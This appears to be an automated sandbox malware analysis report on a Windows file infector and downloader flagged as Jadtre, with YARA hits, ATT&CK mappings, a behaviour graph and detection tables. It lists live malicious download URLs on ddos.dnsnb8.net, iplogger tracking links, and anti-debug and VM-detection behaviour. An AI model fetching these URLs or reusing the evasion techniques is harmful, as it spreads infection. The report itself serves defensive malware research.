                        Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                        Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeAPI call chain: ExitProcess graph end nodegraph_6-1049
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BFB926 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00BFB926
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00CCE044 mov eax, dword ptr fs:[00000030h]4_2_00CCE044
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00C08457 mov eax, dword ptr fs:[00000030h]4_2_00C08457
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00C12578 mov eax, dword ptr fs:[00000030h]4_2_00C12578
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BF4FE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00BF4FE5
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BFB926 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00BFB926
                        Source: SciTE.exe.6.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00C16803
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: EnumSystemLocalesW,4_2_00C16AF0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: EnumSystemLocalesW,4_2_00C16AA5
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: EnumSystemLocalesW,4_2_00C0EA37
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: EnumSystemLocalesW,4_2_00C16B8B
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00C16F8F
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: GetLocaleInfoW,4_2_00C0EF99
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00C17164
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,6_2_00AD1718
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00C12A60 _free,_free,_free,GetTimeZoneInformation,_free,4_2_00C12A60
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,6_2_00AD139F
                        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: Process Memory Space: MDSxhU.exe PID: 2876, type: MEMORYSTR
                        Source: Yara matchFile source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, type: SAMPLE
                        Source: Yara matchFile source: 4.0.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe PID: 3212, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: Process Memory Space: MDSxhU.exe PID: 2876, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Native API
                        1
                        LSASS Driver
                        1
                        LSASS Driver
                        1
                        Deobfuscate/Decode Files or Information
                        11
                        Input Capture
                        12
                        System Time Discovery
                        1
                        Taint Shared Content
                        1
                        Archive Collected Data
                        2
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/Job1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        3
                        Obfuscated Files or Information
                        LSASS Memory3
                        File and Directory Discovery
                        Remote Desktop Protocol11
                        Input Capture
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        Access Token Manipulation
                        12
                        Software Packing
                        Security Account Manager13
                        System Information Discovery
                        SMB/Windows Admin SharesData from Network Shared Drive11
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                        Process Injection
                        1
                        DLL Side-Loading
                        NTDS1
                        Query Registry
                        Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Masquerading
                        LSA Secrets131
                        Security Software Discovery
                        SSHKeylogging113
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials1
                        Virtualization/Sandbox Evasion
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Access Token Manipulation
                        DCSync1
                        Process Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                        Process Injection
                        Proc Filesystem1
                        System Network Configuration Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1480317 Sample: 65BD7E49FE292748F0C504DCBEF... Startdate: 24/07/2024 Architecture: WINDOWS Score: 100 29 ww12.icodeps.com 2->29 31 15.164.165.52.in-addr.arpa 2->31 33 5 other IPs or domains 2->33 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Antivirus detection for URL or domain 2->47 49 13 other signatures 2->49 8 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe 13 2->8         started        signatures3 process4 dnsIp5 35 ww99.icodeps.com 67.225.218.41, 49701, 80 LIQUIDWEBUS United States 8->35 37 iplogger.org 172.67.132.113, 443, 49703 CLOUDFLARENETUS United States 8->37 39 2 other IPs or domains 8->39 21 C:\Users\user\AppData\Local\Temp\MDSxhU.exe, PE32 8->21 dropped 12 MDSxhU.exe 20 8->12         started        17 WerFault.exe 21 16 8->17         started        file6 process7 dnsIp8 41 ddos.dnsnb8.net 44.221.84.105, 49699, 49704, 49705 AMAZON-AESUS United States 12->41 23 C:\Program Files\7-Zip\Uninstall.exe, PE32 12->23 dropped 25 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 12->25 dropped 27 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 12->27 dropped 51 Antivirus detection for dropped file 12->51 53 Multi AV Scanner detection for dropped file 12->53 55 Detected unpacking (changes PE section rights) 12->55 57 2 other signatures 12->57 19 WerFault.exe 19 16 12->19         started        file9 signatures10 process11

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe97%ReversingLabsWin32.Virus.Jadtre
                        65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe100%AviraW32/Jadtre.B
                        65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe100%AviraJS/SpyBanker.G2
                        65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
                        C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
                        C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
                        C:\Users\user\AppData\Local\Temp\MDSxhU.exe100%AviraTR/Dldr.Small.Z.haljq
                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                        C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\MDSxhU.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\MDSxhU.exe92%ReversingLabsWin32.Trojan.Madeba
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://www.amazon.com/0%URL Reputationsafe
                        https://iplogger.org/12QMs70%Avira URL Cloudsafe
                        https://iplogger.org/1Cr3a70%Avira URL Cloudsafe
                        https://iplogger.org/1TBch70%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k4.rarUX100%Avira URL Cloudmalware
                        https://iplogger.org/1fHtp70%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k5.rar86)100%Avira URL Cloudphishing
                        https://iplogger.org/1E2ma70%Avira URL Cloudsafe
                        https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf4https://jkcpt.s3.ap-south-1.amazonaws.com/dwqd5https0%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k3.rar100%Avira URL Cloudphishing
                        https://www.google.com0%Avira URL Cloudsafe
                        https://iplogger.org/1LvRk70%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k3.rarXX100%Avira URL Cloudmalware
                        https://iplogger.org/1NsYz70%Avira URL Cloudsafe
                        https://sa-us-bucket.s3.us-east-2.amazonaws.com/jhvre240%Avira URL Cloudsafe
                        https://iplogger.org/12TMs70%Avira URL Cloudsafe
                        https://iplogger.org/1Tkij70%Avira URL Cloudsafe
                        https://iplogger.org/1pcji70%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k2.rar(__100%Avira URL Cloudphishing
                        https://iplogger.org/1GWfv70%Avira URL Cloudsafe
                        https://iplogger.org/1b48870%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k5.rarP_100%Avira URL Cloudphishing
                        https://iplogger.org/1rqRg70%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k2.rarcC:100%Avira URL Cloudphishing
                        http://ddos.dnsnb8.net:799/cj//k1.rar100%Avira URL Cloudmalware
                        http://www.spaceblue.com0%Avira URL Cloudsafe
                        https://iplogger.org/1pdxr70%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k5.rarq_100%Avira URL Cloudmalware
                        http://ddos.dnsnb8.net:799/cj//k4.rarcC:100%Avira URL Cloudphishing
                        https://iplogger.org/1J2q670%Avira URL Cloudsafe
                        https://iplogger.org/1Jeq670%Avira URL Cloudsafe
                        https://iplogger.org/1xvbz70%Avira URL Cloudsafe
                        https://iplogger.org/1746b70%Avira URL Cloudsafe
                        https://iplogger.org/1NpYz70%Avira URL Cloudsafe
                        http://www.develop.comDeepak0%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net/trol100%Avira URL Cloudphishing
                        http://ngdatas.pw/https://www.icodeps.com/0.0.0.0%d.%d.%d.%dhttp-1ZIP0%Avira URL Cloudsafe
                        https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf4Datam0%Avira URL Cloudsafe
                        http://www.mkpmc.com0%Avira URL Cloudsafe
                        http://ww12.icodeps.com/Certificates0%Avira URL Cloudsafe
                        https://iplogger.org/1rDMq785https://iplogger.org/1rd8N686https://iplogger.org/1spuy788https://iplog0%Avira URL Cloudsafe
                        https://iplogger.org/1uW6i70%Avira URL Cloudsafe
                        https://iplogger.org/1uS4i70%Avira URL Cloudsafe
                        https://iplogger.org/1s4qp70%Avira URL Cloudsafe
                        https://iplogger.org/1Ghzj70%Avira URL Cloudsafe
                        http://www.activestate.com0%Avira URL Cloudsafe
                        http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
                        https://iplogger.org/1TW3i70%Avira URL Cloudsafe
                        http://parking.parklogic.com/page/enhance.js?pcId=12&domain=icodeps.com0%Avira URL Cloudsafe
                        https://iplogger.org/1mxKf70%Avira URL Cloudsafe
                        http://www.spaceblue.comMathias0%Avira URL Cloudsafe
                        http://www.mkpmc.com/Home/Index/getdata0%Avira URL Cloudsafe
                        https://iplogger.org/1vk2Q70%Avira URL Cloudsafe
                        http://ww12.icodeps.com/0%Avira URL Cloudsafe
                        https://iplogger.org/1J9q670%Avira URL Cloudsafe
                        https://iplogger.org/1NyYz70%Avira URL Cloudsafe
                        https://iplogger.org/1ELna70%Avira URL Cloudsafe
                        https://prntscr.com/upload.php0%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k5.rarw100%Avira URL Cloudmalware
                        https://sm.ms/api/v2/upload?inajax=10%Avira URL Cloudsafe
                        https://iplogger.org/14Jup70%Avira URL Cloudsafe
                        https://www.google.com/search?q=admob&oq=admob0%Avira URL Cloudsafe
                        http://www.lua.org0%Avira URL Cloudsafe
                        https://iplogger.org/1Gczj70%Avira URL Cloudsafe
                        http://ww12.icodeps.com/?usid=26&utid=73344464810%Avira URL Cloudsafe
                        https://iplogger.org/1SWks70%Avira URL Cloudsafe
                        https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf40%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net/100%Avira URL Cloudphishing
                        https://iplogger.org/1YkFc70%Avira URL Cloudsafe
                        http://ww12.icodeps.com//60%Avira URL Cloudsafe
                        https://gady45.s3.amazonaws.com/sadjj60%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k3.rarcC:100%Avira URL Cloudmalware
                        https://iplogger.org/1vv2Q70%Avira URL Cloudsafe
                        http://ww12.icodeps.com/osoft0%Avira URL Cloudsafe
                        https://iplogger.org/1CDGu70%Avira URL Cloudsafe
                        https://jkcpt.s3.ap-south-1.amazonaws.com/dwqd50%Avira URL Cloudsafe
                        https://iplogger.org/1756b70%Avira URL Cloudsafe
                        http://ww99.icodeps.com/W70%Avira URL Cloudsafe
                        https://iplogger.org/1Gjzj70%Avira URL Cloudsafe
                        http://www.scintilla.org/scite.rng0%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k3.rar8100%Avira URL Cloudphishing
                        https://iplogger.org/1Gbzj70%Avira URL Cloudsafe
                        https://iplogger.org/1spuy70%Avira URL Cloudsafe
                        http://www.channelinfo.pw/index.php/Home/Index/getExe0%Avira URL Cloudsafe
                        http://ww99.icodeps.com/o70%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k4.rarffice100%Avira URL Cloudphishing
                        https://iplogger.org/0%Avira URL Cloudsafe
                        https://iplogger.org/1XJq970%Avira URL Cloudsafe
                        https://iplogger.org/1BBCf70%Avira URL Cloudsafe
                        https://trkpcy.net/track.0%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k2.rar100%Avira URL Cloudmalware
                        https://iplogger.org/143up70%Avira URL Cloudsafe
                        https://www.smartsharesystems.com/0%Avira URL Cloudsafe
                        http://www.baanboard.comBrendon0%Avira URL Cloudsafe
                        http://www.scintilla.org0%Avira URL Cloudsafe
                        http://ddos.dnsnb8.net:799/cj//k1.rarq_100%Avira URL Cloudphishing
                        http://ddos.dnsnb8.net:799/cj//k5.rar8100%Avira URL Cloudphishing
                        https://iplogger.org/1HWGc70%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        765534.parkingcrew.net
                        13.248.148.254
                        truefalse
                          unknown
                          ddos.dnsnb8.net
                          44.221.84.105
                          truefalse
                            unknown
                            ww99.icodeps.com
                            67.225.218.41
                            truefalse
                              unknown
                              iplogger.org
                              172.67.132.113
                              truefalse
                                unknown
                                www.icodeps.com
                                172.232.25.148
                                truefalse
                                  unknown
                                  15.164.165.52.in-addr.arpa
                                  unknown
                                  unknowntrue
                                    unknown
                                    ww12.icodeps.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      http://ddos.dnsnb8.net:799/cj//k3.rarfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://sa-us-bucket.s3.us-east-2.amazonaws.com/jhvre24true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://ddos.dnsnb8.net:799/cj//k1.rarfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://iplogger.org/1NpYz7false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://ddos.dnsnb8.net:799/cj//k5.rarfalse
                                        unknown
                                        http://ddos.dnsnb8.net:799/cj//k2.rarfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://ddos.dnsnb8.net:799/cj//k5.rar86)MDSxhU.exe, 00000006.00000002.1753575155.000000000138E000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://iplogger.org/12QMs765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://ddos.dnsnb8.net:799/cj//k4.rarUXMDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://iplogger.org/1E2ma765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://iplogger.org/1TBch765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.activestate.comHolgerSciTE.exe.6.drfalse
                                          unknown
                                          https://iplogger.org/1Cr3a765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1fHtp765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf4https://jkcpt.s3.ap-south-1.amazonaws.com/dwqd5https65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1NsYz765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1Tkij765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ddos.dnsnb8.net:799/cj//k3.rarXXMDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://www.google.com65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1pcji765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/12TMs765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1LvRk765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ddos.dnsnb8.net:799/cj//k2.rar(__MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://iplogger.org/1GWfv765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1b488765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1pdxr765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1rqRg765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.spaceblue.comSciTE.exe.6.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ddos.dnsnb8.net:799/cj//k5.rarP_MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          http://ddos.dnsnb8.net:799/cj//k2.rarcC:MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          http://ddos.dnsnb8.net:799/cj//k4.rarcC:MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          http://ddos.dnsnb8.net:799/cj//k5.rarq_MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://iplogger.org/1J2q6765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1Jeq6765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.develop.comDeepakSciTE.exe.6.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1746b765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1xvbz765BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ddos.dnsnb8.net/trolMDSxhU.exe, 00000006.00000003.1361370867.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1361518674.00000000013AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          http://ngdatas.pw/https://www.icodeps.com/0.0.0.0%d.%d.%d.%dhttp-1ZIP65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.mkpmc.com65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf4Datam65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.00000000010EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
